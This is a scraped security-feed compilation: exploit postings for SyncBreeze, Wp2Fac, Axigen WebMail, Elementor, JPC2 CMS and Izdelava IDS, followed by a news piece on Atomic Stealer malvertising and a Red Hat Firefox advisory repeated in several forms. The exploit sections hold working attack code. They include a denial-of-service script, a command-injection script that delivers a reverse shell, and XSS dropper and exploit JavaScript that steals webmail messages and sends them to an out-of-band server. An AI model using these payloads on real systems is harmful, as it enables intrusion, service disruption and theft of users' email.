SyncBreeze version 15.2.24 suffers from a denial of service vulnerability.

    # Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service# Date: 30/08/2023# Exploit Author: mohamed youssef# Vendor Homepage: https://www.syncbreeze.com/# Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe# Version: 15.2.24# Tested on: windows 10 64-bitimport socketimport timepyload="username=admin&password="+'password='*500+""request=""request+="POST /login HTTP/1.1\r\n"request+="Host: 192.168.217.135\r\n"request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"request+="Accept-Language: en-US,en;q=0.5\r\n"request+="Accept-Encoding: gzip, deflate\r\n"request+="Content-Type: application/x-www-form-urlencoded\r\n"request+="Content-Length: "+str(len(pyload))+"\r\n"request+="Origin: http://192.168.217.135\r\n"request+="Connection: keep-alive\r\n"request+="Referer: http://192.168.217.135/login\r\n"request+="Upgrade-Insecure-Requests: 1\r\n"request+="\r\n"request+=pyloadprint (request)s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.217.135",80))s.send(request.encode())print (s.recv(1024))s.close()time.sleep(5)

SyncBreeze 15.2.24 Denial Of Service

Wp2Fac version 1.0 suffers from an OS command injection vulnerability.

    # Exploit Title: Wp2Fac v1.0 - OS Command Injection# Date: 2023-08-27# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://github.com/metinyesil/wp2fac# Tested on: Kali Linux & Windows 11# CVE: N/Aimport requestsdef send_post_request(host, revshell):    url = f'http://{host}/send.php'    headers = {        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0)Gecko/20100101 Firefox/102.0',        'Accept': '*/*',        'Accept-Language': 'en-US,en;q=0.5',        'Accept-Encoding': 'gzip, deflate',        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',        'X-Requested-With': 'XMLHttpRequest',        'Origin': f'http://{host}',        'Connection': 'close',        'Referer': f'http://{host}/',    }    data = {        'numara': f'1234567890 & {revshell} &;'    }    response = requests.post(url, headers=headers, data=data)    return response.texthost = input("Target IP: ")revshell = input("Reverse Shell Command: ")print("Check your listener!")send_post_request(host, revshell)

Wp2Fac 1.0 Command Injection

Axigen versions 10.5.0–4370c946 and below suffer from a cross site scripting vulnerability.

    # Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS# Google Dork: inurl:passwordexpired=yes# Date: 2023-08-21# Exploit Author: AmirZargham# Vendor Homepage: https://www.axigen.com/# Software Link: https://www.axigen.com/mail-server/download/# Version: (10.5.0–4370c946) and older version of Axigen WebMail# Tested on: firefox,chrome# CVE: CVE-2022-31470ExploitWe use the second Reflected XSS to exploit this vulnerability, create amalicious link, and steal user emails.Dropper codeThis dropper code, loads and executes JavaScript exploit code from a remoteserver.');x = document.createElement('script');x.src = 'https://example.com/exploit.js';window.addEventListener('DOMContentLoaded',function y(){  document.body.appendChild(x)})//Encoded form/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//Exploit codexhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = newXMLHttpRequest();oob_server = 'https://example.com/';var script_tag = document.createElement('script');xhr1.open('GET', '/', true);xhr1.onreadystatechange = () => {    if (xhr1.readyState === XMLHttpRequest.DONE) {        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,true);        xhr2.setRequestHeader('Content-Type', 'application/json');        xhr2.onreadystatechange = () => {            if (xhr2.readyState === XMLHttpRequest.DONE) {                if (xhr2.status === 401){                    script_tag.src =`${oob_server}?status=session_expired&domain=${document.domain}`;                    document.body.appendChild(script_tag);                } else {                    resp = xhr2.responseText;                    folderId = JSON.parse(resp)["mails"][0]["folderId"];                    xhr3.open('GET',`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);                    xhr3.onreadystatechange = () => {                        if (xhr3.readyState === XMLHttpRequest.DONE) {                            emails = xhr3.responseText;                            script_tag.src =`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;                            document.body.appendChild(script_tag);                        }                    };                    xhr3.send();                }            }        };        var body = JSON.stringify({isUnread: false});        xhr2.send(body);    }};xhr1.send();Combining dropper and exploitYou can host the exploit code somewhere and then address it in the droppercode.

Axigen 10.5.0–4370c946 Cross Site Scripting

WordPress Elementor plugin versions prior to 3.5.5 suffer from an iframe injection vulnerability.

    # Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection# Date: 28.08.2023# Exploit Author: Miguel Santareno# Vendor Homepage: https://elementor.com/# Version: < 3.5.5# Tested on: Google and Firefox latest version# CVE : CVE-2022-4953# 1. DescriptionThe plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.# 2. Proof of Concept (PoC)Proof of Concept:https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K

WordPress Elementor Iframe Injection

A new malvertising campaign has been observed distributing an updated version of a macOS stealer malware called Atomic Stealer (or AMOS), indicating that it’s being actively maintained by its author.
An off-the-shelf Golang malware available for $1,000 per month, Atomic Stealer first came to light in April 2023. Shortly after that, new variants with an expanded set of information-gathering

Malvertising / Endpoint Security

A new malvertising campaign has been observed distributing an updated version of a macOS stealer malware called **Atomic Stealer** (or AMOS), indicating that it's being actively maintained by its author.

An off-the-shelf Golang malware available for $1,000 per month, Atomic Stealer first came to light in April 2023. Shortly after that, new variants with an expanded set of information-gathering features were detected in the wild, targeting gamers and cryptocurrency users.

Malvertising via Google Ads has been observed as the primary distribution vector in which users searching for popular software, legitimate or cracked, on search engines are shown bogus ads that direct to websites hosting rogue installers.

The latest campaign involves the use of a fraudulent website for TradingView, prominently featuring three buttons to download the software for Windows, macOS, and Linux operating systems.

"Both the Windows and Linux buttons point to an MSIX installer hosted on Discord that drops NetSupport RAT," Jérôme Segura, director of threat intelligence at Malwarebytes, said.

The macOS payload ("TradingView.dmg") is a new version of Atomic Stealer released at the end of June, which is bundled in an ad-hoc signed app that, once executed, prompts users to enter their password on a fake prompt and harvest files as well as data stored in iCloud Keychain and web browsers.

"Atomic stealer also targets both Chrome and Firefox browsers and has an extensive hardcoded list of crypto-related browser extensions to attack," SentinelOne previously noted in May 2023. Select variants have also targeted Coinomi wallets.

The ultimate goal of the attacker is to bypass Gatekeeper protections in macOS and exfiltrate the stolen information to a server under their control.

The development comes as macOS is increasingly becoming a viable target of malware attacks, with a number of macOS-specific info stealers appearing for sale in crimeware forums in recent months to take advantage of the wide availability of Apple systems in organizations.

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

"While Mac malware really does exist, it tends to be less detected than its Windows counterpart," Segura said. "The developer or seller for AMOS actually made it a selling point that their toolkit is capable of evading detection."

Atomic Stealer is not the only malware propagated via malvertising and search engine optimization (SEO) poisoning campaigns, as evidence has emerged of DarkGate (aka MehCrypter) latching onto the same delivery mechanism.

New versions of DarkGate have since been employed in attacks mounted by threat actors employing tactics similar to that of Scattered Spider, Aon's Stroz Friedberg Incident Response Services said last month.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Mac Users Beware: Malvertising Campaign Spreads Atomic Stealer macOS Malware

Red Hat Security Advisory 2023-5019-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.15.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:5019-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5019  
Issue date:        2023-09-07  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.15.0 ESR.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
firefox-102.15.0-1.el7_9.src.rpm

x86_64:  
firefox-102.15.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
firefox-102.15.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.15.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
firefox-102.15.0-1.el7_9.src.rpm

ppc64:  
firefox-102.15.0-1.el7_9.ppc64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.ppc64.rpm

ppc64le:  
firefox-102.15.0-1.el7_9.ppc64le.rpm  
firefox-debuginfo-102.15.0-1.el7_9.ppc64le.rpm

s390x:  
firefox-102.15.0-1.el7_9.s390x.rpm  
firefox-debuginfo-102.15.0-1.el7_9.s390x.rpm

x86_64:  
firefox-102.15.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:  
firefox-102.15.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.15.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
firefox-102.15.0-1.el7_9.src.rpm

x86_64:  
firefox-102.15.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
firefox-102.15.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.15.0-1.el7_9.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk+ctKAAoJENzjgjWX9erE7AAQAIR+dzCTGF9i9nf0ayNsK3Pe  
Rk4TmAqX4wlOo+bjpYxezU5R8eGn7142w+zN3HZCtnGQGGrNJfJZYa58rSgLftaL  
mFT5gSNslOboKez1PU46DwMlN8umldYr+bzPMJsxLb9+H3Fk3U8WJsG/01onr+4M  
/ebTKrTPwUohKYS+qk3fM/4X/TC4Lt0qjHUR2DQuVKMRrWV+nqKirJ1sysTER8qc  
X7cpuxiPuIy1Ja0Pa/zKwCVbJr5p34aAO2zvVq3Ga757SPIJJO/X+N+SRJihRFKV  
Ac5Js5lbVK8/h9d1abUFMG2055CW2eYo0vesbyeYXoCKlT935X5uItb241rwmQFL  
iGStlIUWrX9pncpAX9ne5KJuYXi7zIUsazfVj1A1m94P8YK0aVnLFHbNLJmrNJga  
x33M0UeagROnjK13pmMI52o6aTF5E8MgUQhsLZC3kk9zW5EMSm1xlN+OuKQhTH7f  
IhatDJg6FBDAEPVAYijNeejdy/kPo8FXBPyoFDVyi5wdGyMyATqIoRG+0/8YsMlG  
MnwYs5C4bz34YOKv0V6jHvqChV/2bHNGSiW9vJEAZ6hA58SneJHwSmach5Cp7eON  
IXeIGOmVFwJMTS30jSXdWUGMPyUxqMAKxs4ayPnEURhOCjRhBvMXqtwpEIG/pz+m  
6lKd728IFmTZmFnZ11sb  
=s3dk  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5019-01

JPC2 CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ======================================================================================================================================| # Title     : JPC2 CMS v1.0 Sql injection Vulnerability                                                                            || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                              || # Vendor    : https://www.facebook.com/JPC2GroupWeb                                                                                |  | # Dork      : "Web design and development JPC2 Group Web"                                                                          |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  inject here : http://127.0.0.1/wwwnpmlexcom/en/pagina.php?idcate=13[+]  Panel       : http://127.0.0.1/wwwnpmlexcom/en/administrador/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

JPC2 CMS 1.0 SQL Injection

Izdelava IDS version 2.0 suffers from a cross site scripting vulnerability.

**Izdelava IDS 2.0 Cross Site Scripting**

Posted Sep 7, 2023

Authored by indoushka

Izdelava IDS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 0ef798585da30c6f8445d7bd8186a6b3603ee0ca8ce5383bd27b385d754bf05c

Download | Favorite | View

**Izdelava IDS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Izdelava IDS v2.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://studiointera.net                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /preview.php?id=9'<script>alert(/indoushka/);</script>[+] http://127.0.0.1/gspostojnanet/vnosi/cms/preview.php?id=9%27%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,139)
*   Arbitrary (16,235)
*   BBS (2,859)
*   Bypass (1,743)
*   CGI (1,027)
*   Code Execution (7,289)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,499)
*   Encryption (2,370)
*   Exploit (52,056)
*   File Inclusion (4,227)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,791)
*   Intrusion Detection (892)
*   Java (3,049)
*   JavaScript (859)
*   Kernel (6,717)
*   Local (14,491)
*   Magazine (586)
*   Overflow (12,701)
*   Perl (1,423)
*   PHP (5,152)
*   Proof of Concept (2,343)
*   Protocol (3,604)
*   Python (1,535)
*   Remote (30,843)
*   Root (3,588)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,893)
*   Shell (3,192)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,208)
*   SQL Injection (16,403)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,811)
*   Web (9,691)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,988)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,828)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,638)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,823)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,885)
*   UNIX (9,305)
*   UnixWare (186)
*   Windows (6,582)
*   Other

Izdelava IDS 2.0 Cross Site Scripting

An update for firefox is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2023-4051: The Mozilla Foundation Security Advisory describes this flaw as:
A website could have obscured the full screen notification by using the file open dialog. This could have led to user confusion and possible spoofing attacks.
* CVE-2023-4053: The Mozilla Foundation Security Advisory describes this flaw as:
A website could have obscured the full screen notification by using a URL with a scheme handled by an external program, such as a mailto URL. This could have led to user confusion and possible spoofing attacks.
* CVE-2023-4573: The Mozilla Foundation Security Advisory describes this flaw as:
When receiving rendering data over IPC `mStream` could have been destroyed when initialized, which could have led to a use-after-free causing a potentially exploitable crash.
* CVE-2023-4574: The Mozilla Foundation Security Advisory describes this flaw as:
When creating a callback over IPC for showing the Color Picker window, multiple of the same callbacks could have been created at a time and eventually all simultaneously destroyed as soon as one of the callbacks finished. This could have led to a use-after-free causing a potentially exploitable crash.
* CVE-2023-4575: The Mozilla Foundation Security Advisory describes this flaw as:
When creating a callback over IPC for showing the File Picker window, multiple of the same callbacks could have been created at a time and eventually all simultaneously destroyed as soon as one of the callbacks finished. This could have led to a use-after-free causing a potentially exploitable crash.
* CVE-2023-4577: The Mozilla Foundation Security Advisory describes this flaw as:
When `UpdateRegExpStatics` attempted to access `initialStringHeap` it could already have been garbage collected prior to entering the function, which could potentially have led to an exploitable crash.
* CVE-2023-4578: The Mozilla Foundation Security Advisory describes this flaw as:
When calling `JS::CheckRegExpSyntax` a Syntax Error could have been set which would end in calling `convertToRuntimeErrorAndClear`. A path in the function could attempt to allocate memory when none is available which would have caused a newly created Out of Memory exception to be mishandled as a Syntax Error.
* CVE-2023-4580: The Mozilla Foundation Security Advisory describes this flaw as:
Push notifications stored on disk in private browsing mode were not being encrypted potentially allowing the leak of sensitive information.
* CVE-2023-4581: The Mozilla Foundation Security Advisory describes this flaw as:
Excel `.xll` add-in files did not have a blocklist entry in Firefox's executable blocklist which allowed them to be downloaded without any warning of their potential harm.
* CVE-2023-4583: The Mozilla Foundation Security Advisory describes this flaw as:
When checking if the Browsing Context had been discarded in `HttpBaseChannel`, if the load group was not available then it was assumed to have already been discarded which was not always the case for private channels after the private session had ended.
* CVE-2023-4584: The Mozilla Foundation Security Advisory describes this flaw as:
Memory safety bugs present in Firefox 116, Firefox ESR 102.14, Firefox ESR 115.1, Thunderbird 102.14, and Thunderbird 115.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
* CVE-2023-4585: The Mozilla Foundation Security Advisory describes this flaw as:
Memory safety bugs present in Firefox 116, Firefox ESR 115.1, and Thunderbird 115.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-09-07

Updated:

2023-09-07

**RHSA-2023:5019 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: firefox security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for firefox is now available for Red Hat Enterprise Linux 7.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.  

This update upgrades Firefox to version 102.15.0 ESR.  

Security Fix(es):  

*   Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)
*   Mozilla: Memory corruption in IPC ColorPickerShownCallback (CVE-2023-4574)
*   Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)
*   Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)
*   Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2 (CVE-2023-4584)
*   Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2 (CVE-2023-4585)
*   Mozilla: Full screen notification obscured by file open dialog (CVE-2023-4051)
*   Mozilla: Full screen notification obscured by external program (CVE-2023-4053)
*   Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception (CVE-2023-4578)
*   Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)
*   Mozilla: XLL file extensions were downloadable without warnings (CVE-2023-4581)
*   Mozilla: Browsing Context potentially not cleared when closing Private Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to take effect.

**Affected Products**

*   Red Hat Enterprise Linux Server 7 x86\_64
*   Red Hat Enterprise Linux Workstation 7 x86\_64
*   Red Hat Enterprise Linux Desktop 7 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems 7 s390x
*   Red Hat Enterprise Linux for Power, big endian 7 ppc64
*   Red Hat Enterprise Linux for Power, little endian 7 ppc64le

**Fixes**

*   BZ - 2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator
*   BZ - 2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback
*   BZ - 2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback
*   BZ - 2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics
*   BZ - 2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog
*   BZ - 2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception
*   BZ - 2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program
*   BZ - 2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted
*   BZ - 2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings
*   BZ - 2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window
*   BZ - 2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2
*   BZ - 2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

**CVEs**

*   CVE-2023-4051
*   CVE-2023-4053
*   CVE-2023-4573
*   CVE-2023-4574
*   CVE-2023-4575
*   CVE-2023-4577
*   CVE-2023-4578
*   CVE-2023-4580
*   CVE-2023-4581
*   CVE-2023-4583
*   CVE-2023-4584
*   CVE-2023-4585

**Red Hat Enterprise Linux Server 7**

SRPM

firefox-102.15.0-1.el7\_9.src.rpm

SHA-256: 88cad1101c4409891f95fa58df3c7ce740f30b6a6c2160e0a6c13b618b8207dc

x86\_64

firefox-102.15.0-1.el7\_9.i686.rpm

SHA-256: 0e7fc47ecd4661f94cc0fe39a02795c1e8400b9b4713adaf62d4099894921540

firefox-102.15.0-1.el7\_9.x86\_64.rpm

SHA-256: ed9d320136a4c9ea7992ebe9fa335539a2523c2987fdbf7109121465a94eb6a5

firefox-debuginfo-102.15.0-1.el7\_9.i686.rpm

SHA-256: ed00c6e5b8207b1060596e4e84c74b80f95dadb6b3d6b0279e2dc6fb189ca532

firefox-debuginfo-102.15.0-1.el7\_9.x86\_64.rpm

SHA-256: e84178f0af08f12dfbf44a53471c477e9d2b3aa6f8626a0f49bd21509ba3c0fc

**Red Hat Enterprise Linux Workstation 7**

SRPM

firefox-102.15.0-1.el7\_9.src.rpm

SHA-256: 88cad1101c4409891f95fa58df3c7ce740f30b6a6c2160e0a6c13b618b8207dc

x86\_64

firefox-102.15.0-1.el7\_9.i686.rpm

SHA-256: 0e7fc47ecd4661f94cc0fe39a02795c1e8400b9b4713adaf62d4099894921540

firefox-102.15.0-1.el7\_9.x86\_64.rpm

SHA-256: ed9d320136a4c9ea7992ebe9fa335539a2523c2987fdbf7109121465a94eb6a5

firefox-debuginfo-102.15.0-1.el7\_9.i686.rpm

SHA-256: ed00c6e5b8207b1060596e4e84c74b80f95dadb6b3d6b0279e2dc6fb189ca532

